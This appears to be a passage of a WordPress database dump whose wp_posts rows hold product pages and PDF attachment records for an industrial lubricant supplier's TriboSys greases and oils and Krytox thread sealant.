INSERT INTO `wp_posts` VALUES (3285, 2, '2016-12-21 16:26:18', '2016-12-21 16:26:18', '<h3>TriboSys 218X | Roller Chain Oils</h3>\nThese powerful penetrating roller chain oils are used in applications where the lubricant penetrates to reach the pins and bushings located within the roller chain. Additional applications include hinges, castors, rollers, bolts, screw assemblies, bushings and cables.\n\nThey protect equipment by retarding rust corrosion, and are excellent for aiding in the disassembly of rusted parts. They are non-oily, which prevents dust, lint and particulate contamination build up and minimize wear, noise, chain stretch and untimely equipment failure.\n\n<strong>TriboSys™ 2180</strong>\nThis oil is proven to extend chain life operating in wet conditions. It penetrates and leaves a water resistant, protective film on chain and part surfaces.\n\n<strong>Advantages</strong>\n• Anti-Wear Protection\n• Excellent Rust and Corrosion Protection\n• Water Resistant\n\n<strong>TriboSys™ 2181</strong>\nA light chain oil fortified with a highly concentrated package of submicron sized molybdenum disulfide. It lubricates maximum and rapid penetration into pins, rollers and bushings, reducing wear and chain stretch.\n\n<strong>Advantages</strong>\n• Eliminates Contamination Buildup\n• Penetrates to Loosen and Free Stiff Chains\n• Cleans Chain\n• Quickly Produces Flexible Chain Action\n• Eliminates Chain Stick/Slip Motion', 'TriboSys 218X | Roller Chain Oils', '<strong>Roller Chain Oils</strong>\n<br /><br />\nThese powerful penetrating chain oils are used in applications where the lubricant penetrates to reach the pins and bushings located within the roller chain.', 'inherit', 'closed', 'closed', '', '1646-autosave-v1', '', '', '2016-12-21 16:26:18', '2016-12-21 16:26:18', '', 1646, 'https://www.miller-stephenson.com/1646-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3286, 0, '2016-12-21 16:26:41', '2016-12-21 16:26:41', '', '', '', 'publish', 'closed', 'closed', '', '3286', '', '', '2016-12-21 16:26:42', '2016-12-21 16:26:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/3286/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3287, 2, '2016-12-21 16:46:21', '2016-12-21 16:46:21', '<h3>TriboSys 222X | High Temperature Greases</h3>\nThese high temperature greases are formulated to provide continuing lubrication long after conventional lubricants have failed. They are problem solvers for bearings exposed to very high temperatures and various forms of contamination.\n<h4><strong>TriboSys™ 2220G</strong></h4>\nThis grease has a non-drip feature that makes it desirable for high speeds and temperatures. It is made from a combination of an ashless, inorganic thickener and a blend of synthetic base fluids which were originally developed for jet aircraft use.\n\n<strong>Advantages</strong>\n• High Speed\n• Non-Carbonizing\n• Cleans as it Lubricates\n<h4><strong>TriboSys™ 2221G</strong></h4>\nThis grease has a combination of medium viscosity synthetic base oils, anti-wear additives and high temperature solids. It is formulated to handle the mid to high ranges of speed and temperature. Exceptional resistance to heat and moisture and ideal for applications where drippage cannot be tolerated.\n\n<strong>Advantages</strong>\n• Controlled Volatility Extends Lube Cycles\n• Medium to High Speeds\n• Plain, Journal and Anti-Friction Bearings\n• Lubricating Solids\n<h4><strong>TriboSys™ 2222G</strong></h4>\nThis grease contains high viscosity synthetic base fluids with an ashless inorganic thickener which is designed for high temperature-sealed-for-life bearings. It has exceptional in oven and tenter frame bearing usage where temperatures constantly exceed 350˚F/177˚C.\n\n<strong>Advantages</strong>\n• Red Color for Easy Identification\n• Slow to Medium Speeds\n• Extended Lube Cycles\n• Extends Both Bearing and Shaft Life\n• Low Base Oil Volatili', 'TriboSys 222X | High Temperature Greases', '<strong>High Temperature Greases</strong>\n<br /><br />\nThese greases are formulated to provide continuing lubrication long after conventional lubricants have failed. They are problem solvers for bearings exposed to very high temperatures and various forms of contamination.', 'inherit', 'closed', 'closed', '', '1648-autosave-v1', '', '', '2016-12-21 16:46:21', '2016-12-21 16:46:21', '', 1648, 'https://www.miller-stephenson.com/1648-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3288, 2, '2016-12-21 16:54:18', '2016-12-21 16:54:18', '<h3>TriboSys 221X | General Purpose Greases</h3>\nThis family of synthetically blended general purpose greases are formulated for a wide range of applications and for extremes of speed, temperature and pressure.\n<h4><strong>TriboSys™ 2210G</strong></h4>\nThis grease has high quality fluids with an inorganic thickener to produce excellent temperature stability.\n\n<strong>Advantages</strong>\n• Extends Lube Cycles\n• Extends Bearing and Shaft Life\n• Good for All Bearing Design\n<h4><strong>TriboSys™ 2211G</strong></h4>\nThis high temperature grease is formulated for universal multi-purpose use. This lithium complex based grease has an exceptionally high drop point and excellent cold weather pumpability making it desirable for multi-purpose applications. Its texture is tacky-fibrous to resist the wiping and squeezing actions present in plain bearings, bushing and sleeves.\n\n<strong>Advantages</strong>\n<ul>\n 	<li>High Temperature Protection</li>\n 	<li>Shear Stability\n• Water and Steam Resistant\n• Extreme Pressure and Wear\n• Elevated Temperature Protection\n• Attractive Red Color</li>\n</ul>\n<h4><strong>TriboSys™ </strong><strong>2212G</strong></h4>\nThis grease is a combination of synthetic fluids, high viscosity base oils, and special additives including a friction reducing molybdenum disulfide (MoS2) package.\n\n<strong>Advantages</strong>\n<ul>\n 	<li>Impervious to Water and Steam Washout</li>\n 	<li>Drop point Over 500˚F/260˚C</li>\n 	<li>Resistant to mild chemicals; acids, alkalines, detergents, soaps</li>\n 	<li>Extreme Pressure and Anti-Wear Protection</li>\n 	<li>Extends Equipment Life</li>\n</ul>\n<h4><strong>TriboSys™ 2213G</strong></h4>\nThis grease contains a Calcium Sulfonate base that provides inherent extreme pressure properties and unequaled protection against water, moisture, condensation, rust and corrosion attacks. It has exceptional oxidation and mechanical stability. The high drop point assures superior protection at continuous, elevated temperatures. It contains no heavy metals and has excellent compatibility with other greases.\n\n<strong>Advantages</strong>\n<ul>\n 	<li>Excellent Rust and Corrosion Protection</li>\n 	<li>High Drop Point</li>\n 	<li>Water Resistant</li>\n 	<li>Excellent in Corrosive Environment</li>\n</ul>\n&nbsp;', 'TriboSys 221X | General Purpose Greases', '<strong>General Purpose Greases</strong>\n<br /><br />\nThis family of synthetically blended greases are formulated for a wide range of applications and for extremes of speed, temperature and pressure.', 'inherit', 'closed', 'closed', '', '1647-autosave-v1', '', '', '2016-12-21 16:54:18', '2016-12-21 16:54:18', '', 1647, 'https://www.miller-stephenson.com/1647-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3290, 2, '2016-12-21 18:23:34', '2016-12-21 18:23:34', '<h3>TriboSys 223X | Multi-Purpose Food Grade Greases</h3>\nThese food grade lubricants are comprised of FDA (Food &amp; Drug Administration) approved ingredients in compliance with CFR, Title 21, Paragraph 178.3570 of the FDA guidelines. These virtually tasteless, odorless, nontoxic lubricants meet the demanding operating conditions of modern Food and Pharmaceutical facilities. They have exceptional anti-wear and load carrying abilities, while being fortified with approved oxidation inhibitors to maximize resistance to chemical changes, resulting in a longer protective life. These greases have exceptional resistance to gumming and the formation of other harmful deposits, and are used extensively as anti-rust and anti-corrosion coatings for all types of surfaces located in production areas\n\n<strong style="font-size: 14.4px;">2230FG</strong>\n\nThis grease is a multi-purpose bearing grease that possesses an excellent combination of temperature and load carrying abilities, providing a tough, durable lubricating film between bearing surfaces. The non-melt feature gives maximum retention and mechanical stability in all bearing designs, guaranteeing extended bearing and shaft life.\n\nAdvantages:\n<ul>\n 	<li>Odorless and Tasteless</li>\n 	<li>Extends Lube Cycles</li>\n 	<li>Extra Load Protection</li>\n 	<li>Water Clear Color</li>\n</ul>\n<strong>2231FG</strong>\n\nThis grease has a combination of medium viscosity synthetic base oils, anti-wear additives and high temperature solids. It is formulated to handle the mid to high ranges of speed and temperature. Exceptional resistance to heat and moisture and ideal for applications where drippage cannot be tolerated.\n\nAdvantages:\n<ul>\n 	<li>Controlled Volatility Extends Lube Cycles</li>\n 	<li>Medium to High Speeds</li>\n 	<li>Plain, Journal and Anti-Friction Bearings</li>\n 	<li>Lubricating Solids</li>\n</ul>\n<strong>2232FG</strong>\n\nA synthetic formula that provides extra protection in extreme temperature operating ranges. It is suitable for all low temperature jobs, such as cold storage and freezer equipment. Because of its durability in all applications, it can be used throughout plants as the all-purpose bearing grease.\n\nAdvantages:\n<ul>\n 	<li>High Temperature Protection</li>\n 	<li>Pliable Down to -65˚F/-54˚C</li>\n 	<li>Anti-Wear Properties</li>\n 	<li>Maximum Part Life</li>\n 	<li>Extended Lube Cycles</li>\n</ul>\n<strong>2233FG</strong>\n\nAn NSF/USDA registered grease that provides the ultimate in corrosion protection. Totally impervious to water, steam and salt water washout. This high performance Food Grade Grease contains no heavy metals and will operate over a wide temperature range. It has extreme pressure properties that excel when all other Food Grade Greases fail.\n\nAdvantages:\n<ul>\n 	<li>Unsurpassed Corrosion Protection</li>\n 	<li>Low Temperature Pumpability</li>\n 	<li>Wide Operating Temperature Range</li>\n 	<li>Excellent Oxidation Stability</li>\n</ul>', 'TriboSys 223X | Multi-Purpose Food Grade Greases', '<strong>Multi-Purpose Food Grade Greases</strong>\n<br /><br />\nThese food grade lubricants are comprised of FDA (Food & Drug Administration) approved ingredients in compliance with CFR, Title 21, Paragraph 178.3570 of the FDA guidelines. These virtually tasteless, odorless, nontoxic lubricants meet the demanding operating conditions of modern Food and Pharmaceutical facilities.', 'inherit', 'closed', 'closed', '', '1649-autosave-v1', '', '', '2016-12-21 18:23:34', '2016-12-21 18:23:34', '', 1649, 'https://www.miller-stephenson.com/1649-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3291, 2, '2016-12-22 15:28:38', '2016-12-22 15:28:38', '', '143te-red-16', '', 'inherit', 'closed', 'closed', '', '143te-red-16', '', '', '2016-12-22 15:28:38', '2016-12-22 15:28:38', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-RED-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3292, 2, '2016-12-22 15:28:40', '2016-12-22 15:28:40', '', '143te-1-0-16', '', 'inherit', 'closed', 'closed', '', '143te-1-0-16', '', '', '2016-12-22 15:28:40', '2016-12-22 15:28:40', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-1.0-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3293, 2, '2016-12-22 15:28:41', '2016-12-22 15:28:41', '', '143te-2-0-16', '', 'inherit', 'closed', 'closed', '', '143te-2-0-16', '', '', '2016-12-22 15:28:41', '2016-12-22 15:28:41', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.0-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3294, 2, '2016-12-22 15:28:42', '2016-12-22 15:28:42', '', '143te-2-5-16', '', 'inherit', 'closed', 'closed', '', '143te-2-5-16', '', '', '2016-12-22 15:28:42', '2016-12-22 15:28:42', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.5-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3295, 2, '2016-12-22 15:28:44', '2016-12-22 15:28:44', '', '143te-5-16', '', 'inherit', 'closed', 'closed', '', '143te-5-16', '', '', '2016-12-22 15:28:44', '2016-12-22 15:28:44', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-5-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3296, 2, '2016-12-22 15:28:46', '2016-12-22 15:28:46', '', '143te-10-16', '', 'inherit', 'closed', 'closed', '', '143te-10-16', '', '', '2016-12-22 15:28:46', '2016-12-22 15:28:46', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3297, 2, '2016-12-22 15:28:47', '2016-12-22 15:28:47', '', '143te-16', '', 'inherit', 'closed', 'closed', '', '143te-16', '', '', '2016-12-22 15:28:47', '2016-12-22 15:28:47', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3298, 2, '2016-12-22 15:28:49', '2016-12-22 15:28:49', '', '250-series', '', 'inherit', 'closed', 'closed', '', '250-series', '', '', '2016-12-22 15:28:49', '2016-12-22 15:28:49', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/250-Series.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3299, 2, '2016-12-22 15:28:51', '2016-12-22 15:28:51', '', '280-15', '', 'inherit', 'closed', 'closed', '', '280-15', '', '', '2016-12-22 15:28:51', '2016-12-22 15:28:51', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/280-15.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3300, 2, '2016-12-22 15:28:52', '2016-12-22 15:28:52', '', '470c-16', '', 'inherit', 'closed', 'closed', '', '470c-16', '', '', '2016-12-22 15:28:52', '2016-12-22 15:28:52', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/470C-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3301, 2, '2016-12-22 15:28:54', '2016-12-22 15:28:54', '', '470s-16', '', 'inherit', 'closed', 'closed', '', '470s-16', '', '', '2016-12-22 15:28:54', '2016-12-22 15:28:54', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/470S-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3302, 2, '2016-12-22 15:28:55', '2016-12-22 15:28:55', '', '472s-16', '', 'inherit', 'closed', 'closed', '', '472s-16', '', '', '2016-12-22 15:28:55', '2016-12-22 15:28:55', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/472S-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3303, 2, '2016-12-22 15:28:57', '2016-12-22 15:28:57', '', '487g-16', '', 'inherit', 'closed', 'closed', '', '487g-16', '', '', '2016-12-22 15:28:57', '2016-12-22 15:28:57', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/487G-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3304, 2, '2016-12-22 15:28:59', '2016-12-22 15:28:59', '', '530n-16', '', 'inherit', 'closed', 'closed', '', '530n-16', '', '', '2016-12-22 15:28:59', '2016-12-22 15:28:59', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/530N-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3305, 2, '2016-12-22 15:29:00', '2016-12-22 15:29:00', '', '532n-16', '', 'inherit', 'closed', 'closed', '', '532n-16', '', '', '2016-12-22 15:29:00', '2016-12-22 15:29:00', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3306, 2, '2016-12-22 15:29:02', '2016-12-22 15:29:02', '', '538n-16', '', 'inherit', 'closed', 'closed', '', '538n-16', '', '', '2016-12-22 15:29:02', '2016-12-22 15:29:02', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/538N-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3307, 2, '2016-12-22 15:29:03', '2016-12-22 15:29:03', '', '539n-16', '', 'inherit', 'closed', 'closed', '', '539n-16', '', '', '2016-12-22 15:29:03', '2016-12-22 15:29:03', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3308, 2, '2016-12-22 15:29:05', '2016-12-22 15:29:05', '', '550n-16', '', 'inherit', 'closed', 'closed', '', '550n-16', '', '', '2016-12-22 15:29:05', '2016-12-22 15:29:05', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3309, 2, '2016-12-22 15:29:07', '2016-12-22 15:29:07', '', '552n-16', '', 'inherit', 'closed', 'closed', '', '552n-16', '', '', '2016-12-22 15:29:07', '2016-12-22 15:29:07', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3310, 2, '2016-12-22 15:29:08', '2016-12-22 15:29:08', '', '580n-16', '', 'inherit', 'closed', 'closed', '', '580n-16', '', '', '2016-12-22 15:29:08', '2016-12-22 15:29:08', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3311, 2, '2016-12-22 15:29:10', '2016-12-22 15:29:10', '', '582n-16', '', 'inherit', 'closed', 'closed', '', '582n-16', '', '', '2016-12-22 15:29:10', '2016-12-22 15:29:10', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3312, 2, '2016-12-22 15:29:11', '2016-12-22 15:29:11', '', 'pfpe-grease-with-soluble-additive', '', 'inherit', 'closed', 'closed', '', 'pfpe-grease-with-soluble-additive', '', '', '2016-12-22 15:29:11', '2016-12-22 15:29:11', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/PFPE-Grease-with-Soluble-Additive.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3313, 2, '2016-12-22 15:29:13', '2016-12-22 15:29:13', '', 'releasys-82-16', '', 'inherit', 'closed', 'closed', '', 'releasys-82-16', '', '', '2016-12-22 15:29:13', '2016-12-22 15:29:13', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3314, 2, '2016-12-22 15:29:14', '2016-12-22 15:29:14', '', 'releasys-85-16', '', 'inherit', 'closed', 'closed', '', 'releasys-85-16', '', '', '2016-12-22 15:29:14', '2016-12-22 15:29:14', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3315, 2, '2016-12-22 15:29:16', '2016-12-22 15:29:16', '', 'releasys-88-16', '', 'inherit', 'closed', 'closed', '', 'releasys-88-16', '', '', '2016-12-22 15:29:16', '2016-12-22 15:29:16', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3316, 2, '2016-12-22 15:29:17', '2016-12-22 15:29:17', '', 'releasys-89-16', '', 'inherit', 'closed', 'closed', '', 'releasys-89-16', '', '', '2016-12-22 15:29:17', '2016-12-22 15:29:17', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3317, 2, '2016-12-22 15:29:19', '2016-12-22 15:29:19', '', 'releasys-8200-16', '', 'inherit', 'closed', 'closed', '', 'releasys-8200-16', '', '', '2016-12-22 15:29:19', '2016-12-22 15:29:19', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3318, 2, '2016-12-22 15:29:20', '2016-12-22 15:29:20', '', 'releasys-8500-16', '', 'inherit', 'closed', 'closed', '', 'releasys-8500-16', '', '', '2016-12-22 15:29:20', '2016-12-22 15:29:20', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3319, 2, '2016-12-22 15:29:22', '2016-12-22 15:29:22', '', 'releasys-8800-16', '', 'inherit', 'closed', 'closed', '', 'releasys-8800-16', '', '', '2016-12-22 15:29:22', '2016-12-22 15:29:22', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3320, 2, '2016-12-22 15:29:23', '2016-12-22 15:29:23', '', 'releasys-8900-16', '', 'inherit', 'closed', 'closed', '', 'releasys-8900-16', '', '', '2016-12-22 15:29:23', '2016-12-22 15:29:23', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3321, 2, '2016-12-22 15:29:25', '2016-12-22 15:29:25', '', 'xht-bd-series', '', 'inherit', 'closed', 'closed', '', 'xht-bd-series', '', '', '2016-12-22 15:29:25', '2016-12-22 15:29:25', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/XHT-BD-series.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3322, 2, '2016-12-22 15:29:26', '2016-12-22 15:29:26', '', '10x', '', 'inherit', 'closed', 'closed', '', '10x', '', '', '2016-12-22 15:29:26', '2016-12-22 15:29:26', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/10X.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3323, 2, '2016-12-22 15:29:28', '2016-12-22 15:29:28', '', '110xn-16', '', 'inherit', 'closed', 'closed', '', '110xn-16', '', '', '2016-12-22 15:29:28', '2016-12-22 15:29:28', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3324, 2, '2016-12-22 15:29:29', '2016-12-22 15:29:29', '', '122avl-16', '', 'inherit', 'closed', 'closed', '', '122avl-16', '', '', '2016-12-22 15:29:29', '2016-12-22 15:29:29', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3325, 2, '2016-12-22 15:29:30', '2016-12-22 15:29:30', '', '122sel-16', '', 'inherit', 'closed', 'closed', '', '122sel-16', '', '', '2016-12-22 15:29:30', '2016-12-22 15:29:30', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3326, 2, '2016-12-22 15:29:32', '2016-12-22 15:29:32', '', '143e-16', '', 'inherit', 'closed', 'closed', '', '143e-16', '', '', '2016-12-22 15:29:32', '2016-12-22 15:29:32', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/143E-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3327, 2, '2016-12-22 15:29:33', '2016-12-22 15:29:33', '', '143h-16', '', 'inherit', 'closed', 'closed', '', '143h-16', '', '', '2016-12-22 15:29:33', '2016-12-22 15:29:33', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/143H-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3328, 2, '2016-12-22 15:29:35', '2016-12-22 15:29:35', '', '143te-blue-16', '', 'inherit', 'closed', 'closed', '', '143te-blue-16', '', '', '2016-12-22 15:29:35', '2016-12-22 15:29:35', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3329, 2, '2016-12-22 16:17:04', '2016-12-22 16:17:04', '<h1>[share title=""]</h1>\r\n<h1><strong>Krytox TS4 Thread Sealant</strong></h1>\r\n<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly. Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n<h4><strong>Key Benefits of Kytox™ TS4:</strong></h4>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<h4><strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong></h4>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n<h4><strong>Recommended Product:</strong></h4>\r\n[ux_product_categories ids="165" number="10"]\r\n\r\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-12-22 16:17:04', '2016-12-22 16:17:04', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3330, 2, '2016-12-22 16:18:31', '2016-12-22 16:18:31', '<h3>[share title=""]</h3>\r\n<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: 